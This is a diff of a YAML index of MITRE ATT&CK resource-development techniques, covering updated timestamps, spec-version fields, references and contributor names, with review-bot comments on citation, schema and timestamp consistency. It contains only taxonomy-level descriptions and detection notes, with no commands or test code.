+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
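Review bot: the new T1586.003 sentence names Twilio, SendGrid, AWS End User Messaging, SNS and SES as abuse targets for spam and phishing, but `x_mitre_detection` is left saying the activity takes place outside the target organisation's visibility. Those services are provisioned, billed and logged inside the compromised tenant, so the detection guidance is now partly stale for the case the description adds; that is upstream ATT&CK text, so it is worth raising there rather than editing locally. The version bump to 1.1 and the citation of `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`, both added in the following hunk, are consistent with the description change.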
@@ -58816,10 +59479,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -58827,9 +59499,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -58880,11 +59551,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -58897,7 +59567,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -58932,22 +59602,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
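Review bot: the new `(Citation: Invictus IR DangerDev 2024)` in the added Route53 paragraph needs a matching `external_references` entry or it renders as a dangling citation key; that entry is only added in the `@@ -59007,6 +59680,10 @@` hunk below, so this hunk must not be cherry-picked without it. Separately, `spec_version: '2.1'` is dropped here and from every other technique object in this diff. `spec_version` is a required property on STIX 2.1 domain objects, so if anything downstream validates these entries as STIX objects rather than consuming them as an index, the removal will fail validation; either keep the line or state in the commit message that the index is no longer meant to be STIX-shaped.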
@@ -58968,7 +59641,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -59007,6 +59680,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -59062,7 +59739,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -59120,7 +59796,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -59200,7 +59875,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -59260,7 +59934,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -59282,7 +59955,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
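Review bot: `modified` for T1588.001 moves backwards, from 2022-04-25T14:00:00.188Z to 2021-10-17T16:15:52.805Z. The identical 2022-04-25T14:00:00.188Z stamp is replaced by older values on T1585.001, T1587.004 and T1608.003 further down, so the previous value looks like a bulk timestamp from an earlier regeneration rather than an upstream one. Worth a line in the commit message confirming the older timestamps come from the ATT&CK bundle this run used, because consumers that compare `modified` to detect updated techniques will see these entries as unchanged or older.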
@@ -59301,42 +59974,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
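Review bot: two different things happen in this hunk and only one is cosmetic. At the top, T1588.001 loses `x_mitre_attack_spec_version: 2.1.0` with no replacement, while the re-serialised entries elsewhere in the diff receive `x_mitre_attack_spec_version: 3.2.0`; any consumer reading that field will now find it missing for T1588.001. The rest of the hunk deletes T1583.003's `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all four cited references, which reappear with the same values in the next hunk in a different key order. YAML mapping order carries no meaning, so this part is serialiser churn; having the generator emit keys in a fixed order would keep future diffs down to the real changes (`modified`, the spec version, the reference URL fixes).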
@@ -59345,22 +59986,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
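Review bot: the re-inserted T1583.003 block is complete (the same `id` attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795 and all five `source_name`s from the removed block, so no `(Citation: ...)` in the detection text is left dangling) and it gains explicit `x_mitre_deprecated: false` and `revoked: false`, which the previous serialisation lacked; code that filters on `revoked` no longer has to treat a missing key as false. `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0 while `x_mitre_version` stays at '1.1', which is expected since the former tracks the data-model version rather than the technique content.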
@@ -59374,7 +60046,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
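Review bot: the contributor credit change from `- Goldstein Menachem` to `- Menachem Goldstein` is a surname/given-name swap, and the same correction is applied to T1608.005 later in this diff. Please grep the rest of the file for the old spelling so the credit is not split across two forms, and check that any contributor index built from this field is keyed on the new one.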
@@ -59461,11 +60133,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -59525,7 +60196,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -59567,7 +60237,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -59582,7 +60252,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -59673,11 +60342,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -59710,15 +60378,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
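Review bot: the only wording change in the re-wrapped description is the added parenthetical `(including one-time, single use links)`, which mirrors the `(including one-time, single use domain names)` added to T1583.001 at the top of this diff; the rest of the hunk is a re-flow of a double-quoted YAML scalar, and since line breaks inside a double-quoted scalar fold to single spaces the rendered text is otherwise unchanged. The closing quote after `Talos IPFS 2022)` is intact. The `- Goldstein Menachem` to `- Menachem Goldstein` fix here matches the one on T1584.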
@@ -59802,7 +60471,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -59856,7 +60524,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -59907,36 +60574,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -59945,21 +60586,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
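Review bot: the Recorded Future reference in the restored T1588.002 block changes from `https://www.recordedfuture.com/identifying-cobalt-strike-servers/` to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` and its `Retrieved` date moves to September 16, 2024 in the same entry, which is the right way to record a re-fetched source; the same pairing of new URL plus new retrieval date appears for the Turla reference in T1584.006 just below and for the Beacon Certificates reference in T1588. The restored block carries all three `source_name`s from the removed block plus the SOCCRATES and Mnemonic AS contributors, so nothing is dropped in the move.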
@@ -60005,17 +60672,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -60041,7 +60707,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -60073,8 +60739,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
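Review bot: T1585.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0`, and unlike the re-serialised techniques (T1583.003, T1588.002, T1588) it receives no `x_mitre_attack_spec_version: 3.2.0` in return; combined with the `modified` regression to 2021-10-16 in the preceding hunk, this entry now looks like it was regenerated from an older bundle than its neighbours. T1587.004 and T1608.003 below follow the same pattern (2021 `modified`, both spec fields gone). If the intent is to drop `x_mitre_attack_spec_version` from the index, do it for every technique; otherwise these three should keep the field.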
@@ -60101,7 +60765,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -60125,8 +60789,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
